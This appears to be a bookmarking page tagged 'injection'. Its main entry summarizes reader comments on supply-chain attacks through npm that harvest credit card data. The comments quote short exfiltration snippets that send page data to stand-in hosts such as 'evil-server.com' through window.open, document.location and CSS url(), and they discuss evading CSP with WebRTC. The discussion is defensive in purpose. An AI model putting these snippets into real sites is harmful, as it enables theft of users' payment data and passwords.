injection   3167

I’m harvesting credit card numbers and passwords from your site. Here’s how.
Extremely legit concern.

Comments:

* npm package compromises did happen, e.g.
  * https://github.com/conventional-changelog/conventional-changelog/issues/282#issuecomment-365367804
  * https://www.bleepingcomputer.com/news/security/somebody-tried-to-hide-a-backdoor-in-a-popular-javascript-npm-package/
  * https://www.theregister.co.uk/2017/08/02/chrome_web_developer_extension_hacked/

* Any way to prevent outgoing connections through
  ``window.open(`https://legit-analytics.com?q=${payload}`, '_blank').close()`` with CSP?
  A: Wow, didn't think of that and no, I don't know if CSP can prevent that.


* "Not just NPM… Think of Joomla extensions or WordPress plugins. A nice way to compromise millions of “traditional” PHP based websites"

* "It isn’t that far from the truth. Something similar is happening already: https://blog.sucuri.net/2017/10/credit-card-stealer-investigation-uncovers-malware-ring.html"

* "Typosquatting attacks apply to any software dependency not just open source and not just npm. Malicious submissions happen in the walled garden Apple App Store and Google Play stores, but since they hold moderation capability centrally and have a large volume of paid staffers, they can do something about it faster than volunteers typically do. A fake WhatsApp app on Google Play store was downloaded by more than 1 million people before it was taken down.

This is definitely a conversation we need to have.

Surprised there was no mention of delayed attacks (e.g., gain trust, gain users, then inject malicious changes in a future version).

Another variation on this would be to approach maintainers (say 10k+ download Firefox or Chrome extension authors, or WordPress authors) and offer them a “custom” advertising program if they just install your code you pay them… maybe your ads seem easy or exceptionally non-intrusive, but that’s because the ads are not the true goal."

* "This is scary and let’s not forget the server side.
Node.js is becoming popular on the server side and backend developers are also using a lot of NPM dependencies without vetting them thoroughly.
For example an Express middleware module should be able to gather the same data and forward it wherever (…and there are a lot of Express middleware modules in the NPM repository).

Although there are perhaps more possibilities on the server side to prevent malicious code from communicating back (for example using network limitations) — I wouldn’t be surprised if most front facing Node.js servers had few limitations on what Internet hosts they could communicate with."

* "you could use webrtc datachannels for sending out data.. it is not affected by CSP at all .. yet..

https://github.com/w3c/webappsec-csp/issues/92"

* "At the end of the day, if you can do `document.location = 'https://evil-server.com/bounce?q=' + data` (e.g. in a form submit event) and bounce back to the original site quickly enough, you can get data out."

* "If the CSP doesn’t define a style-src you could use `insertRule` to add some css.
e.g. `something::after { content: url("evilserver.com/userdatastring") }`"

* "Yeah, Google Tag Manager scripts are super-dangerous, it’s so easy for someone to push a nasty script targeted at your site one day, then remove it the next."

* Chrome extensions with "Access data on all sites you visit" can easily swap crypto addresses on exchange sites with their own.

* "About npm, I’d add that an easy way to increase the level of trust of a package is to release many ‘patch’ versions per day. This artificially increases the number of downloads, because of the tons of services spending their time to spot package updates (CI tools, stats services and others)."
JavaScript  code  injection  attack  hack  security  against  npm  open  source 
yesterday by dandv
Angular Testing: provide injected @Attribute in TestBed - Stack Overflow
The parameter passed to the constructor is always null. Does anybody know a solution? I'm using Angular 5.2.10.
attribute  angular  injection 
28 days ago by vespertilian
The Beginners Guide to Codecaves - CodeProject
0xCC or 0x00 sections where you can inject your own code
exploitation  code  injection  research  security 
6 weeks ago by plaxx
lmacken/pyrasite: Inject code into running Python processes
GitHub is where people build software. More than 27 million people use GitHub to discover, fork, and contribute to over 80 million projects.
github  debug  python  injection  inject  code  gdb  author  community:irc#pyrasite 
8 weeks ago by Spark